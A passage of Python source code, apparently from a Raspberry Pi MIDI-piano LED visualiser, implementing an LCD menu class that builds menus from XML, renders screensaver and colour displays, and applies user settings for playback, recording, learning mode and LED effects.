def startNewThread(method, args=()):
t = threading.Thread(target=method, args=args)
t.start()
def getKeysByValue(inpDict, value):
return [k for k,v in inpDict.items() if v == value]
|
menulcd.py
|
import os
from subprocess import call
from xml.dom import minidom
from lib.ledsettings import LedSettings
import webcolors as wc
from PIL import ImageFont, Image, ImageDraw
import LCD_1in3
import LCD_1in44
import LCD_Config
from lib.functions import *
import RPi.GPIO as GPIO
class MenuLCD:
def __init__(self, xml_file_name, args, usersettings, ledsettings, ledstrip, learning, saving, midiports):
self.usersettings = usersettings
self.ledsettings = ledsettings
self.ledstrip = ledstrip
self.learning = learning
self.saving = saving
self.midiports = midiports
fontdir = "/usr/share/fonts/truetype/freefont"
if args.fontdir != None:
fontdir = args.fontdir
self.lcd_ttf = fontdir + "/FreeSansBold.ttf"
if not os.path.exists(self.lcd_ttf):
raise RuntimeError("Cannot locate font file: %s" % self.lcd_ttf)
if args.display == '1in3':
self.LCD = LCD_1in3.LCD()
self.font = ImageFont.truetype(fontdir + '/FreeMonoBold.ttf', self.scale(10))
self.image = Image.open('webinterface/static/logo240_240.bmp')
else:
self.LCD = LCD_1in44.LCD()
self.font = ImageFont.load_default()
self.image = Image.open('webinterface/static/logo128_128.bmp')
self.LCD.LCD_Init()
self.LCD.LCD_ShowImage(self.image, 0, 0)
self.DOMTree = minidom.parse(xml_file_name)
self.currentlocation = "menu"
self.scroll_hold = 0
self.cut_count = 0
self.pointer_position = 0
self.background_color = usersettings.get_setting_value("background_color")
self.text_color = usersettings.get_setting_value("text_color")
self.update_songs()
self.update_ports()
self.update_led_note_offsets()
self.speed_multiplier = 1
self.screensaver_settings = dict()
self.screensaver_settings['time'] = usersettings.get_setting_value("time")
self.screensaver_settings['date'] = usersettings.get_setting_value("date")
self.screensaver_settings['cpu_chart'] = usersettings.get_setting_value("cpu_chart")
self.screensaver_settings['cpu'] = usersettings.get_setting_value("cpu")
self.screensaver_settings['ram'] = usersettings.get_setting_value("ram")
self.screensaver_settings['temp'] = usersettings.get_setting_value("temp")
self.screensaver_settings['network_usage'] = usersettings.get_setting_value("network_usage")
self.screensaver_settings['sd_card_space'] = usersettings.get_setting_value("sd_card_space")
self.screensaver_settings['local_ip'] = usersettings.get_setting_value("local_ip")
self.screensaver_delay = usersettings.get_setting_value("screensaver_delay")
self.screen_off_delay = usersettings.get_setting_value("screen_off_delay")
self.led_animation_delay = usersettings.get_setting_value("led_animation_delay")
self.led_animation = usersettings.get_setting_value("led_animation")
self.screen_on = usersettings.get_setting_value("screen_on")
self.screen_status = 1
self.screensaver_is_running = False
def toggle_screensaver_settings(self, setting):
setting = setting.lower()
setting = setting.replace(" ", "_")
if str(self.screensaver_settings[setting]) == "1":
self.usersettings.change_setting_value(setting, "0")
self.screensaver_settings[setting] = "0"
else:
self.usersettings.change_setting_value(setting, "1")
self.screensaver_settings[setting] = "1"
def update_songs(self):
# Assume the first node is "Choose song"
replace_node = self.DOMTree.getElementsByTagName("Play_MIDI")[0]
choose_song_mc = self.DOMTree.createElement("Play_MIDI")
choose_song_mc.appendChild(self.DOMTree.createTextNode(""))
choose_song_mc.setAttribute("text", "Choose song")
replace_node.parentNode.replaceChild(choose_song_mc, replace_node)
# Assume the first node is "Load song"
replace_node = self.DOMTree.getElementsByTagName("Learn_MIDI")[0]
load_song_mc = self.DOMTree.createElement("Learn_MIDI")
load_song_mc.appendChild(self.DOMTree.createTextNode(""))
load_song_mc.setAttribute("text", "Load song")
replace_node.parentNode.replaceChild(load_song_mc, replace_node)
songs_list = os.listdir("Songs")
for song in songs_list:
# List of songs for Play_MIDI
element = self.DOMTree.createElement("Choose_song")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", song)
choose_song_mc.appendChild(element)
# List of songs for Learn_MIDI
element = self.DOMTree.createElement("Load_song")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", song)
load_song_mc.appendChild(element)
def update_sequence_list(self):
seq_mc = self.DOMTree.createElement("LED_Strip_Settings")
seq_mc.appendChild(self.DOMTree.createTextNode(""))
seq_mc.setAttribute("text", "Sequences")
mc = self.DOMTree.getElementsByTagName("Sequences")[0]
mc.parentNode.parentNode.replaceChild(seq_mc, mc.parentNode)
ret = True
try:
sequences_tree = minidom.parse("sequences.xml")
self.update_songs()
i = 0
while True:
try:
i += 1
sequence_name = \
sequences_tree.getElementsByTagName("sequence_" + str(i))[0].getElementsByTagName(
"sequence_name")[
0].firstChild.nodeValue
element = self.DOMTree.createElement("Sequences")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", str(sequence_name))
seq_mc.appendChild(element)
except:
break
except:
ret = False
element = self.DOMTree.createElement("Sequences")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Update")
seq_mc.appendChild(element)
return ret
def update_ports(self):
ports = mido.get_input_names()
ports = list(dict.fromkeys(ports))
self.update_sequence_list()
# Replace Input and Playback with empty elements
element = self.DOMTree.createElement("Ports_Settings")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Input")
mc = self.DOMTree.getElementsByTagName("Ports_Settings")[0]
mc.parentNode.replaceChild(element, mc)
element = self.DOMTree.createElement("Ports_Settings")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Playback")
mc = self.DOMTree.getElementsByTagName("Ports_Settings")[1]
mc.parentNode.replaceChild(element, mc)
for port in ports:
element = self.DOMTree.createElement("Input")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", port)
mc = self.DOMTree.getElementsByTagName("Ports_Settings")[0]
mc.appendChild(element)
element = self.DOMTree.createElement("Playback")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", port)
mc = self.DOMTree.getElementsByTagName("Ports_Settings")[1]
mc.appendChild(element)
def update_led_note_offsets(self):
note_offsets = self.ledsettings.note_offsets
mc = self.DOMTree.getElementsByTagName("LED_Note_Offsets")[0]
mc_note_offsets = self.DOMTree.createElement("LED_Strip_Settings")
mc_note_offsets.appendChild(self.DOMTree.createTextNode(""))
mc_note_offsets.setAttribute("text", "LED Note Offsets")
parent = mc.parentNode.parentNode
parent.replaceChild(mc_note_offsets, mc.parentNode)
element = self.DOMTree.createElement("LED_Note_Offsets")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Add Note Offset")
mc_note_offsets.appendChild(element)
i = 0
for note_offset in note_offsets:
i += 1
element = self.DOMTree.createElement("LED_Note_Offsets")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Offset%s" % i)
mc_note_offsets.appendChild(element)
op_element = self.DOMTree.createElement("Offset%s" % i)
op_element.appendChild(self.DOMTree.createTextNode(""))
op_element.setAttribute("text", "LED Number")
element.appendChild(op_element)
op_element = self.DOMTree.createElement("Offset%s" % i)
op_element.appendChild(self.DOMTree.createTextNode(""))
op_element.setAttribute("text", "LED Offset")
element.appendChild(op_element)
op_element = self.DOMTree.createElement("Offset%s" % i)
op_element.appendChild(self.DOMTree.createTextNode(""))
op_element.setAttribute("text", "Delete")
element.appendChild(op_element)
if i > 0:
element = self.DOMTree.createElement("LED_Note_Offsets")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Append Note Offset")
mc_note_offsets.appendChild(element)
def update_multicolor(self, colors_list):
i = 0
self.update_ports()
rgb_names = ["Red", "Green", "Blue"]
mc = self.DOMTree.getElementsByTagName("Multicolor")[0]
mc_multicolor = self.DOMTree.createElement("LED_Color")
mc_multicolor.appendChild(self.DOMTree.createTextNode(""))
mc_multicolor.setAttribute("text", "Multicolor")
parent = mc.parentNode.parentNode
parent.replaceChild(mc_multicolor, mc.parentNode)
for color in colors_list:
i = i + 1
element = self.DOMTree.createElement("Multicolor")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Color" + str(i))
#mc = self.DOMTree.getElementsByTagName("LED_Color")[0]
mc_multicolor.appendChild(element)
element = self.DOMTree.createElement("Color" + str(i))
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "RGB Color" + str(i))
mc = self.DOMTree.getElementsByTagName("Multicolor")[0]
mc.appendChild(element)
# adding key range to menu
element = self.DOMTree.createElement("Color" + str(i))
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Key range" + str(i))
mc = self.DOMTree.getElementsByTagName("Multicolor")[0]
mc.appendChild(element)
element = self.DOMTree.createElement("Key_range" + str(i))
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Start")
mc = self.DOMTree.getElementsByTagName("Color" + str(i))[0]
mc.appendChild(element)
element = self.DOMTree.createElement("Key_range" + str(i))
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "End")
mc = self.DOMTree.getElementsByTagName("Color" + str(i))[0]
mc.appendChild(element)
# adding delete
element = self.DOMTree.createElement("Color" + str(i))
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Delete")
mc = self.DOMTree.getElementsByTagName("Multicolor")[0]
mc.appendChild(element)
for rgb_name in rgb_names:
element = self.DOMTree.createElement("RGB_Color" + str(i))
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", rgb_name)
mc = self.DOMTree.getElementsByTagName("Color" + str(i))[0]
mc.appendChild(element)
# Add in the "Add Color" and "Confirm" into the replaced child
element = self.DOMTree.createElement("Multicolor")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Add Color")
mc_multicolor.appendChild(element)
element = self.DOMTree.createElement("Multicolor")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Confirm")
mc_multicolor.appendChild(element)
def scale(self, size):
return int(round(size * self.LCD.font_scale))
def disable_screen(self):
GPIO.output(24, 0)
self.screen_on = 0
self.usersettings.change_setting_value("screen_on", 0)
def enable_screen(self):
GPIO.output(24, 1)
self.screen_on = 1
self.usersettings.change_setting_value("screen_on", 1)
def show(self, position="default", back_pointer_location=False):
if self.screen_on == 0:
return False
if position == "default" and self.currentlocation:
position = self.currentlocation
refresh = 1
elif position == "default" and not self.currentlocation:
position = "menu"
refresh = 1
else:
position = position.replace(" ", "_")
self.currentlocation = position
refresh = 0
self.image = Image.new("RGB", (self.LCD.width, self.LCD.height), self.background_color)
self.draw = ImageDraw.Draw(self.image)
self.draw.text((self.scale(2), self.scale(5)), position.replace("_", " "), fill=self.text_color, font=self.font)
# getting list of items in current menu
staffs = self.DOMTree.getElementsByTagName(position)
text_margin_top = self.scale(15)
i = 0
list_count = len(staffs)
list_count -= 1
if self.pointer_position > 9:
menu_offset = self.pointer_position - 9
else:
menu_offset = -1
# looping through menu list
for staff in staffs:
self.pointer_position = clamp(self.pointer_position, 0, list_count)
# drawing little arrow to show there are more items above
if self.pointer_position > 9 and i < menu_offset:
self.draw.line(
[
(self.scale(119), self.scale(20)),
(self.scale(125), self.scale(20))
],
fill=self.text_color,
width=(self.scale(2))
)
self.draw.line(
[
(self.scale(119), self.scale(20)),
(self.scale(122), self.scale(17))
],
fill=self.text_color,
width=(self.scale(2))
)
self.draw.line(
[
(self.scale(119), self.scale(20)),
(self.scale(122), self.scale(17))
],
fill=self.text_color,
width=(self.scale(2))
)
i += 1
continue
sid = staff.getAttribute("text")
if not back_pointer_location:
if i == self.pointer_position:
try:
self.parent_menu = staff.parentNode.tagName
except:
self.parent_menu = "end"
self.draw.rectangle(
[
(0, text_margin_top),
(self.LCD.width, text_margin_top + self.scale(11))
],
fill="Crimson"
)
self.draw.text((self.scale(3), text_margin_top), ">", fill=self.text_color, font=self.font)
self.current_choice = sid
else:
if sid == back_pointer_location:
try:
self.parent_menu = staff.parentNode.tagName
except:
self.parent_menu = "data"
self.draw.rectangle([(0, text_margin_top), (self.LCD.width, text_margin_top + self.scale(11))],
fill="Crimson")
self.draw.text((self.scale(3), text_margin_top), ">", fill=self.text_color, font=self.font)
self.current_choice = sid
self.pointer_position = i
# drawing little arrow to show there are more items below
if i == 10 and self.pointer_position < list_count and list_count > 10:
self.draw.line(
[
(self.scale(119), self.scale(120)),
(self.scale(125), self.scale(120))
],
fill=self.text_color,
width=(self.scale(2))
)
self.draw.line(
[
(self.scale(119), self.scale(120)),
(self.scale(122), self.scale(123))
],
fill=self.text_color,
width=(self.scale(2))
)
self.draw.line(
[
(self.scale(122), self.scale(123)),
(self.scale(125), self.scale(120))
],
fill=self.text_color,
width=(self.scale(2))
)
# scrolling text if too long
if self.pointer_position == i and len(sid) > 18:
tobecontinued = ".."
if refresh == 1:
try:
self.cut_count += 1
except:
self.cut_count = -6
else:
cut = 0
self.cut_count = -6
if self.cut_count > (len(sid) - 16):
# hold scrolling on end
if self.scroll_hold < 8:
self.cut_count -= 1
self.scroll_hold += 1
tobecontinued = ""
else:
self.cut_count = -6
self.scroll_hold = 0
cut = self.cut_count
if self.cut_count >= 0:
cut = self.cut_count
else:
cut = 0
else:
cut = 0
tobecontinued = ""
i += 1
# diplaying screensaver status
if self.currentlocation == "Content":
sid_temp = sid.lower()
sid_temp = sid_temp.replace(" ", "_")
if str(self.screensaver_settings[sid_temp]) == "1":
sid_temp = " +"
else:
sid_temp = " -"
sid = sid + sid_temp
self.draw.text((self.scale(10), text_margin_top), sid[cut:(18 + cut)] + tobecontinued, fill=self.text_color,
font=self.font)
text_margin_top += self.scale(10)
# displaying color example
if self.currentlocation == "RGB":
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.get_colors()), fill=self.text_color,
font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(self.ledsettings.get_colors()) + ")")
if "RGB_Color" in self.currentlocation:
self.draw.text((self.scale(10), self.scale(70)),
str(self.ledsettings.get_multicolors(self.currentlocation.replace('RGB_Color', ''))),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)], fill="rgb(" + str(
self.ledsettings.get_multicolors(self.currentlocation.replace('RGB_Color', ''))) + ")")
if "Backlight_Color" in self.currentlocation:
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.get_backlight_colors()),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(self.ledsettings.get_backlight_colors()) + ")")
if "Custom_RGB" in self.currentlocation:
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.get_adjacent_colors()),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(self.ledsettings.get_adjacent_colors()) + ")")
if "Multicolor" in self.currentlocation:
try:
self.draw.rectangle([(self.scale(115), self.scale(50)), (self.LCD.width, self.scale(80))],
fill="rgb(" + str(
self.ledsettings.get_multicolors(self.current_choice.replace('Color', ''))) + ")")
except:
pass
if "Color_for_slow_speed" in self.currentlocation:
red = self.ledsettings.speed_slowest["red"]
green = self.ledsettings.speed_slowest["green"]
blue = self.ledsettings.speed_slowest["blue"]
self.draw.text((self.scale(10), self.scale(70)), str(red) + ", " + str(green) + ", " + str(blue),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(red) + ", " + str(green) + ", " + str(blue) + ")")
if "Color_for_fast_speed" in self.currentlocation:
red = self.ledsettings.speed_fastest["red"]
green = self.ledsettings.speed_fastest["green"]
blue = self.ledsettings.speed_fastest["blue"]
self.draw.text((self.scale(10), self.scale(70)), str(red) + ", " + str(green) + ", " + str(blue),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(red) + ", " + str(green) + ", " + str(blue) + ")")
if "Gradient_start" in self.currentlocation:
red = self.ledsettings.gradient_start["red"]
green = self.ledsettings.gradient_start["green"]
blue = self.ledsettings.gradient_start["blue"]
self.draw.text((self.scale(10), self.scale(70)), str(red) + ", " + str(green) + ", " + str(blue),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(red) + ", " + str(green) + ", " + str(blue) + ")")
if "Gradient_end" in self.currentlocation:
red = self.ledsettings.gradient_end["red"]
green = self.ledsettings.gradient_end["green"]
blue = self.ledsettings.gradient_end["blue"]
self.draw.text((self.scale(10), self.scale(70)), str(red) + ", " + str(green) + ", " + str(blue),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(red) + ", " + str(green) + ", " + str(blue) + ")")
if "Color_in_scale" in self.currentlocation:
red = self.ledsettings.key_in_scale["red"]
green = self.ledsettings.key_in_scale["green"]
blue = self.ledsettings.key_in_scale["blue"]
self.draw.text((self.scale(10), self.scale(70)), str(red) + ", " + str(green) + ", " + str(blue),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(red) + ", " + str(green) + ", " + str(blue) + ")")
if "Color_not_in_scale" in self.currentlocation:
red = self.ledsettings.key_not_in_scale["red"]
green = self.ledsettings.key_not_in_scale["green"]
blue = self.ledsettings.key_not_in_scale["blue"]
self.draw.text((self.scale(10), self.scale(70)), str(red) + ", " + str(green) + ", " + str(blue),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(red) + ", " + str(green) + ", " + str(blue) + ")")
# displaying rainbow offset value
if self.current_choice == "Offset":
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.rainbow_offset), fill=self.text_color,
font=self.font)
if self.current_choice == "Scale":
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.rainbow_scale) + "%",
fill=self.text_color,
font=self.font)
if self.current_choice == "Timeshift":
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.rainbow_timeshift),
fill=self.text_color,
font=self.font)
# displaying brightness value
if self.currentlocation == "Brightness":
self.draw.text((self.scale(10), self.scale(35)), str(self.ledstrip.brightness_percent) + "%",
fill=self.text_color, font=self.font)
miliamps = int(self.ledstrip.LED_COUNT) * (60 / (100 / float(self.ledstrip.brightness_percent)))
amps = round(float(miliamps) / float(1000), 2)
self.draw.text((self.scale(10), self.scale(50)), "Amps needed to " + "\n" + "power " + str(
self.ledstrip.LED_COUNT) + " LEDS with " + "\n" + "white color: " + str(amps), fill=self.text_color,
font=self.font)
if self.currentlocation == "Backlight_Brightness":
self.draw.text((self.scale(10), self.scale(35)), str(self.ledsettings.backlight_brightness_percent) + "%",
fill=self.text_color, font=self.font)
# displaying led count
if self.currentlocation == "Led_count":
self.draw.text((self.scale(10), self.scale(35)), str(self.ledstrip.led_number), fill=self.text_color,
font=self.font)
# displaying shift
if self.currentlocation == "Shift":
self.draw.text((self.scale(10), self.scale(35)), str(self.ledstrip.shift), fill=self.text_color,
font=self.font)
# displaying reverse
if self.currentlocation == "Reverse":
self.draw.text((self.scale(10), self.scale(35)), str(self.ledstrip.reverse), fill=self.text_color,
font=self.font)
if self.current_choice == "LED Number" and self.currentlocation.startswith("Offset"):
try:
self.draw.text((self.scale(10), self.scale(50)), str(
self.ledsettings.note_offsets[int(self.currentlocation.replace('Offset', '')) - 1][0]),
fill=self.text_color, font=self.font)
except:
pass
if self.current_choice == "LED Offset" and self.currentlocation.startswith("Offset"):
try:
self.draw.text((self.scale(10), self.scale(50)), str(
self.ledsettings.note_offsets[int(self.currentlocation.replace('Offset', '')) - 1][1]),
fill=self.text_color, font=self.font)
except:
pass
if "Key_range" in self.currentlocation:
if self.current_choice == "Start":
try:
self.draw.text((self.scale(10), self.scale(50)), str(
self.ledsettings.multicolor_range[int(self.currentlocation.replace('Key_range', '')) - 1][0]),
fill=self.text_color, font=self.font)
except:
pass
else:
self.draw.text((self.scale(10), self.scale(50)), str(
self.ledsettings.multicolor_range[int(self.currentlocation.replace('Key_range', '')) - 1][1]),
fill=self.text_color, font=self.font)
# displaying screensaver settings
if self.currentlocation == "Start_delay":
self.draw.text((self.scale(10), self.scale(70)), str(self.screensaver_delay), fill=self.text_color,
font=self.font)
if self.currentlocation == "Turn_off_screen_delay":
self.draw.text((self.scale(10), self.scale(70)), str(self.screen_off_delay), fill=self.text_color,
font=self.font)
if self.currentlocation == "Led_animation_delay":
self.draw.text((self.scale(10), self.scale(70)), str(self.led_animation_delay), fill=self.text_color,
font=self.font)
# displaying speed values
if self.currentlocation == "Period":
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.speed_period_in_seconds),
fill=self.text_color, font=self.font)
if self.currentlocation == "Max_notes_in_period":
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.speed_max_notes), fill=self.text_color,
font=self.font)
# displaying scale key
if self.currentlocation == "Scale_Coloring":
self.draw.text((self.scale(10), self.scale(70)), "scale: " + str(
self.ledsettings.scales[self.ledsettings.scale_key]),
fill=self.text_color, font=self.font)
# Learn MIDI
if self.currentlocation == "Learn_MIDI":
# Position 1: display Load song
self.draw.text((self.scale(90), self.scale(5 + 10)), str(self.learning.loadingList[self.learning.loading]),
fill=self.text_color, font=self.font)
# Position 2: display Learning Start/Stop
self.draw.text((self.scale(90), self.scale(5 + 20)), str(
self.learning.learningList[self.learning.is_started_midi]),
fill=self.text_color, font=self.font)
# Position 3: display Practice
self.draw.text((self.scale(90), self.scale(5 + 30)), str(
self.learning.practiceList[self.learning.practice]),
fill=self.text_color, font=self.font)
# Position 4: display Hands
self.draw.text((self.scale(90), self.scale(5 + 40)), str(self.learning.handsList[self.learning.hands]),
fill=self.text_color, font=self.font)
# Position 5: display Mute hand
self.draw.text((self.scale(90), self.scale(5 + 50)), str(
self.learning.mute_handList[self.learning.mute_hand]),
fill=self.text_color, font=self.font)
# Position 6: display Start point
self.draw.text((self.scale(90), self.scale(5 + 60)), str(self.learning.start_point) + "%",
fill=self.text_color,
font=self.font)
# Position 7: display End point
self.draw.text((self.scale(90), self.scale(5 + 70)), str(self.learning.end_point) + "%",
fill=self.text_color,
font=self.font)
# Position 8: display Set tempo
self.draw.text((self.scale(90), self.scale(5 + 80)), str(self.learning.set_tempo) + "%",
fill=self.text_color,
font=self.font)
# Position 9,10: display Hands colors
coordR = 7 + 90
coordL = 7 + 100
self.draw.rectangle([(self.scale(90), self.scale(coordR)), (self.LCD.width, self.scale(coordR + 7))],
fill="rgb(" + str(self.learning.hand_colorList[self.learning.hand_colorR])[1:-1] + ")")
self.draw.rectangle([(self.scale(90), self.scale(coordL)), (self.LCD.width, self.scale(coordL + 7))],
fill="rgb(" + str(self.learning.hand_colorList[self.learning.hand_colorL])[1:-1] + ")")
self.LCD.LCD_ShowImage(self.image, 0, 0)
def change_pointer(self, direction):
if direction == 0:
self.pointer_position -= 1
elif direction == 1:
self.pointer_position += 1
self.cut_count = -6
self.show()
def enter_menu(self):
position = self.current_choice.replace(" ", "_")
if not self.DOMTree.getElementsByTagName(position):
self.change_settings(self.current_choice, self.currentlocation)
else:
self.currentlocation = self.current_choice
self.pointer_position = 0
self.cut_count = -6
self.show(self.current_choice)
def go_back(self):
if self.parent_menu != "data":
location_readable = self.currentlocation.replace("_", " ")
self.cut_count = -6
self.show(self.parent_menu, location_readable)
def render_message(self, title, message, delay=500):
self.image = Image.new("RGB", (self.LCD.width, self.LCD.height), self.background_color)
self.draw = ImageDraw.Draw(self.image)
self.draw.text((self.scale(3), self.scale(55)), title, fill=self.text_color, font=self.font)
self.draw.text((self.scale(3), self.scale(65)), message, fill=self.text_color, font=self.font)
self.LCD.LCD_ShowImage(self.image, 0, 0)
LCD_Config.Driver_Delay_ms(delay)
def render_screensaver(self, hour, date, cpu, cpu_average, ram, temp, cpu_history=[], upload=0, download=0,
card_space=0, local_ip="0.0.0.0"):
self.image = Image.new("RGB", (self.LCD.width, self.LCD.height), self.background_color)
self.draw = ImageDraw.Draw(self.image)
total_height = self.scale(1)
info_count = 0
height_left = 1
for key, value in self.screensaver_settings.items():
if str(key) == "time" and str(value) == "1":
total_height += self.scale(31)
elif str(key) == "date" and str(value) == "1":
total_height += self.scale(13)
elif str(key) == "cpu_chart" and str(value) == "1":
total_height += self.scale(35)
else:
if str(value) == "1":
info_count += 1
height_left = self.LCD.height - total_height
if info_count > 0:
info_height_font = height_left / info_count
else:
info_height_font = 0
top_offset = self.scale(2)
if self.screensaver_settings["time"] == "1":
fonthour = ImageFont.truetype(self.lcd_ttf, self.scale(31))
self.draw.text((self.scale(4), top_offset), hour, fill=self.text_color, font=fonthour)
top_offset += self.scale(31)
if self.screensaver_settings["date"] == "1":
font_date = ImageFont.truetype(self.lcd_ttf, self.scale(13))
self.draw.text((self.scale(34), top_offset), date, fill=self.text_color, font=font_date)
top_offset += self.scale(13)
if self.screensaver_settings["cpu_chart"] == "1":
previous_height = 0
c = self.scale(-5)
for cpu_chart in cpu_history:
height = self.scale(((100 - cpu_chart) * 35) / float(100))
self.draw.line([(c, top_offset + previous_height), (c + self.scale(5), top_offset + height)],
fill="Red", width=self.scale(1))
previous_height = height
c += self.scale(5)
top_offset += self.scale(35)
if info_height_font > self.scale(12):
info_height_font = self.scale(12)
font = ImageFont.truetype(self.lcd_ttf, int(info_height_font))
if self.screensaver_settings["cpu"] == "1":
self.draw.text((self.scale(1), top_offset), "CPU: " + str(cpu) + "% (" + str(cpu_average) + "%)",
fill=self.text_color, font=font)
top_offset += info_height_font
if self.screensaver_settings["ram"] == "1":
self.draw.text((self.scale(1), top_offset), "RAM usage: " + str(ram) + "%", fill=self.text_color, font=font)
top_offset += info_height_font
if self.screensaver_settings["temp"] == "1":
self.draw.text((self.scale(1), top_offset), "Temp: " + str(temp) + " C", fill=self.text_color, font=font)
top_offset += info_height_font
if self.screensaver_settings["network_usage"] == "1":
if info_height_font > self.scale(11):
info_height_font_network = self.scale(11)
else:
info_height_font_network = int(info_height_font)
font_network = ImageFont.truetype(self.lcd_ttf,
int(info_height_font_network))
self.draw.text((self.scale(1), top_offset),
"D:" + str("{:.2f}".format(download)) + "Mb/s U:" + str("{:.2f}".format(upload)) + "Mb/s",
fill=self.text_color, font=font_network)
top_offset += info_height_font_network
if self.screensaver_settings["sd_card_space"] == "1":
self.draw.text((self.scale(1), top_offset),
"SD: " + str(round(card_space.used / (1024.0 ** 3), 1)) + "/" + str(
round(card_space.total / (1024.0 ** 3), 1)) + "(" + str(card_space.percent) + "%)",
fill=self.text_color, font=font)
top_offset += info_height_font
if self.screensaver_settings["local_ip"] == "1":
self.draw.text((self.scale(1), top_offset), "IP: " + str(local_ip), fill=self.text_color, font=font)
top_offset += info_height_font
self.LCD.LCD_ShowImage(self.image, 0, 0)
def change_settings(self, choice, location):
if location == "Text_Color":
self.text_color = choice
self.usersettings.change_setting_value("text_color", self.text_color)
if location == "Background_Color":
self.background_color = choice
self.usersettings.change_setting_value("background_color", self.background_color)
if self.text_color == self.background_color:
self.text_color = "Red"
self.usersettings.change_setting_value("text_color", self.text_color)
# Play MIDI
if location == "Choose_song":
self.saving.t = threading.Thread(target=play_midi, args=(choice, self.midiports, self.saving, self,
self.ledsettings, self.ledstrip))
self.saving.t.start()
if location == "Play_MIDI":
if choice == "Save MIDI":
now = datetime.datetime.now()
current_date = now.strftime("%Y-%m-%d %H:%M")
self.render_message("Recording stopped", "Saved as " + current_date, 2000)
self.saving.save(current_date)
self.update_songs()
if choice == "Start recording":
self.render_message("Recording started", "", 2000)
self.saving.start_recording()
if choice == "Cancel recording":
self.render_message("Recording canceled", "", 2000)
self.saving.cancel_recording()
if choice == "Stop playing":
self.saving.is_playing_midi.clear()
self.render_message("Playing stopped", "", 2000)
fastColorWipe(self.ledstrip.strip, True, self.ledsettings)
# Learn MIDI
if location == "Load_song":
self.learning.t = threading.Thread(target=self.learning.load_midi, args=(choice,))
self.learning.t.start()
self.go_back()
if location == "Learn_MIDI":
if choice == "Learning":
if not self.learning.is_started_midi:
self.learning.t = threading.Thread(target=self.learning.learn_midi)
self.learning.t.start()
else:
self.learning.is_started_midi = False
fastColorWipe(self.ledstrip.strip, True, self.ledsettings)
self.show(location)
if location == "Solid":
self.ledsettings.change_color_name(wc.name_to_rgb(choice))
self.ledsettings.color_mode = "Single"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
if location == "Fading":
self.ledsettings.mode = "Fading"
self.usersettings.change_setting_value("mode", self.ledsettings.mode)
if choice == "Very fast":
self.ledsettings.fadingspeed = 50
elif choice == "Fast":
self.ledsettings.fadingspeed = 40
elif choice == "Medium":
self.ledsettings.fadingspeed = 20
elif choice == "Slow":
self.ledsettings.fadingspeed = 10
elif choice == "Very slow":
self.ledsettings.fadingspeed = 2
elif choice == "Instant":
self.ledsettings.fadingspeed = 1000
self.usersettings.change_setting_value("fadingspeed", self.ledsettings.fadingspeed)
if location == "Velocity":
self.ledsettings.mode = "Velocity"
self.usersettings.change_setting_value("mode", self.ledsettings.mode)
if choice == "Fast":
self.ledsettings.fadingspeed = 10
elif choice == "Medium":
self.ledsettings.fadingspeed = 8
elif choice == "Slow":
self.ledsettings.fadingspeed = 6
elif choice == "Very slow":
self.ledsettings.fadingspeed = 3
self.usersettings.change_setting_value("fadingspeed", self.ledsettings.fadingspeed)
if location == "Light_mode":
if choice == "Disabled":
self.ledsettings.mode = "Disabled"
else:
self.ledsettings.mode = "Normal"
self.usersettings.change_setting_value("mode", self.ledsettings.mode)
fastColorWipe(self.ledstrip.strip, True, self.ledsettings)
if location == "Input":
self.midiports.change_port("inport", choice)
if location == "Playback":
self.midiports.change_port("playport", choice)
if location == "Ports_Settings":
